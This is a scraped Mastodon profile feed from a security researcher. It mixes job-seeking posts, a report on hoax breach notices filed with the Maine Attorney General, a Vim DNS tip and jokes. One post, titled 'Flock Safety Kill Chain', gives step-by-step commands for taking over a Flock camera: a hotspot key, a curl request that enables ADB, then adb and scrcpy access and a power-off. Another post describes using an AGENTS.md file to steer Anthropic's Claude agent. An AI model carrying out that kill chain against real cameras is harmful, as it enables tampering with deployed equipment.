Daniel Chateau  (シャトー・ダニエル)

114 Followers
197 Following
664 Posts

eJPT, CC, PenTest+ | Security researcher, embedded systems engineer, gamer, OSS advocate and Twitch affiliate.

I do not speak for my employers.

Pronounshe/him/his
Official Websitehttps://danielchateau.com
Twitterhttps://twitter.com/djchateau
Twitchhttps://twitch.tv/dj_chateau
GitHubhttps://github.com/djchateau
GitLabhttps://gitlab.com/djchateau

RE: https://mastodon.social/@SouthFresh/116766588805078590

This is just... fucking embarrassing.

Hi.  

I'm a professional computer geek in the Bay Area. I've been a sysadmin, designed and built networks, been a penetration tester, done security research, and incident response. I'm flexible enough to work as in aerospace engineering as well as computational pharmacology.

I'm still #unemployed.

I'm searching for a job, on-site or remote. If you're hiring, please DM me, or at least send me a link or two? Please?

#GetFediHired

Following up on a Linkedin post about non-existent security incidents showing up at the Maine Attorney General's list of consumer data breaches, the Maine AG sent me a statement acknowledging that several recent data breach notices that went live on their site were false reports. One notice said Discord had experienced an insider breach affecting more than 10 million people. Another said VRChat had a breach affecting 2.5M people. Both were hoaxes, apparently.

"The Office of the Maine Attorney General has been made aware of an apparent abuse of our data breach reporting system. After conversations with VRChat, one of two affected companies, it has become clear that the reported data breaches were hoaxes submitted by an unknown entity unrelated to either company. These false reports have been removed from the database. We have no knowledge of any recent legitimate data breach reports from either VRChat or Discord.

We are reviewing our procedures to make this abuse less likely in the future while preserving the public availability of such information. The public-facing database will remain offline until then. In the interim, if you are an entity who needs to submit a data breach report, you can continue to do so through our online reporting service. If you need information from existing reports, please contact us at [email protected]."

https://www.maine.gov/ag/news-and-library/press-releases/statement-office-maine-attorney-general-abuse-data-breach-reporting

https://www.linkedin.com/feed/update/urn:li:activity:7470883943907639297/

I wanted to do some #DNS reverse lookup while editing a #Cisco config file in #Vim:

```vim
setlocal iskeyword+=.,:
setlocal keywordprg=dig\ +short\ -x
```

so I can press `K` with the cursor over an #IPv4 or #IPv6 address in the file, and I will get the corresponding PTR record if it exists.

This ended up in my `~/.vim/ftplugin/cisco.vim`.

I hope I find a job again soon. I want to play this game so bad when it releases.

https://youtu.be/yoPi4XW_79w

Star Fox – Overview trailer (Nintendo Switch 2)

YouTube

Student: “So Elon Musk is a trillionaire?”
Me: “Yup.”
Student: “How did he get that much money?”
Me: “Well, he doesn’t really have a trillion dollars cash. He just owns a lot of stock in companies that are valued at a trillion dollars.”
Student: “So those companies make huge profits?”
Me: “Oh gosh no. They all lose billions of dollars a year. All of them. Huge losses.”

The Economist headline: “Gen Z Mysteriously Hates Capitalism and No One Can Figure Out Why.”

Flock Safety Kill Chain thus far:

  • Press back button on camera three times quickly
  • connect to Flock-xxxxxx hotspot with PSK: security
  • curl -x PUT http://192.168.43.1:8080/api/v1/system/adb/enable
  • adb connect 192.168.43.1
  • scrcpy
  • set a PIN/PASSWORD
  • adb shell reboot -p
  • bye bye

    I managed to defeat anthropic's LLM ("claude") today by making an AGENTS.md file that tells it to stop reading the code of your repo

    lessons learned:

    * anthropic's LLM assumes the persona of rich liberal who will only listen to you if you're nice
    * which is to say, if you're too forceful or strict, the LLM will ignore everything you say and will become adversarial
    * anthropic's LLM is literally "the absence of tension is the presence of justice"
    * we live in a society

    https://codeberg.org/queer-computer-club/doorbot/src/branch/doorbot-pro-max-ultra-deluxe-se/AGENTS.md

    RE: https://infosec.exchange/@munin/116676279009390006

    about -that- far from writing out a fucking RFC for "basic security principles you assholes keep breaking"

    RE: https://infosec.exchange/@0xabad1dea/116608476384659862

    I feel like somewhere along the lines, this stopped being about ADHD meds. I can't tell though, I forgot to take mine today and ended up not reading the rest of the post.